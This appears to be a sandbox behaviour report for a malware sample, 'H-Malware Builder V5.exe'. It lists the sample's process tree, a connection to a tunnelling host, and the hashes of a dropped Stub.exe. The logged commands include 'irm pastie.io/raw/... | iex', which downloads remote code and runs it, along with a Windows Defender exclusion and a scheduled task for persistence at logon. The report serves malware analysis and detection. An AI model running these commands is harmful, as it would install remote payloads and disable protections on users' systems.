"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{70d723ce-e6bd-4950-9fe1-2e2241e936fd}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{4800c2ae-4e20-4a42-a492-53c1ef4aa299}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{46e9ec66-f01d-4b50-8228-0f4232b25ffe}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{b3f8c04c-1d58-43d8-9a48-b206af432c89}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{ce19208f-de68-474e-94ad-e735e64db202}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-863592726897148898831894185-1277618161-7568756241633545322623253798-327877081"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{14d33627-d1ae-41db-be42-508bcbf169f5}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{cb43fc64-4f0c-4fa7-b601-49b434df2292}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{0144143a-cdac-403f-bfa4-a54a9a82141b}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{038cfafb-53b7-4f59-a9f4-922764d0358a}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{0138412f-e62e-46db-bb62-ffaedbfbbd3f}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{30209252-4377-4358-8d2c-515bfbb97f40}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{c0506d7b-ea4c-420f-ab39-716b2cacecf7}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{220a36b9-3a5c-4e54-89f8-be232b9302a4}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{7cadd146-3d53-4cae-b16f-84850373a6f8}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{bd7d7a6b-8521-4a77-90ab-c47df246a9c6}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{c3db19d4-cfaf-474c-b450-816b71b64f6f}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{4e6f6a79-98a6-45cb-bb32-3d117b21fed8}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{a8f96154-f0fb-4d73-9bfd-6b1813fa20af}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{acc23d30-69dc-4502-8749-9b6569e1ad64}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | bay-helps.gl.at.ply.gg | udp |
| US | 147.185.221.18:36538 | bay-helps.gl.at.ply.gg | tcp |
| US | 147.185.221.18:36538 | bay-helps.gl.at.ply.gg | tcp |
| US | 147.185.221.18:36538 | bay-helps.gl.at.ply.gg | tcp |
| US | 147.185.221.18:36538 | bay-helps.gl.at.ply.gg | tcp |
| US | 147.185.221.18:36538 | bay-helps.gl.at.ply.gg | tcp |
| US | 147.185.221.18:36538 | bay-helps.gl.at.ply.gg | tcp |
Files
memory/2328-0-0x000007FEF56D3000-0x000007FEF56D4000-memory.dmp
memory/2328-1-0x0000000000290000-0x00000000002FC000-memory.dmp
memory/2628-6-0x0000000002B50000-0x0000000002BD0000-memory.dmp
memory/2628-7-0x000000001B590000-0x000000001B872000-memory.dmp
memory/2628-8-0x0000000001F00000-0x0000000001F08000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
| MD5 | cc63633edfcc147cbaed1959b03d8730 |
| SHA1 | df7a250eba6ee1767b09f7923bfd735635deb9e8 |
| SHA256 | e699d9e9a81e9de82ce7ed645ef2a92ed6231e32cbc18a7e9ddff5c82623d417 |
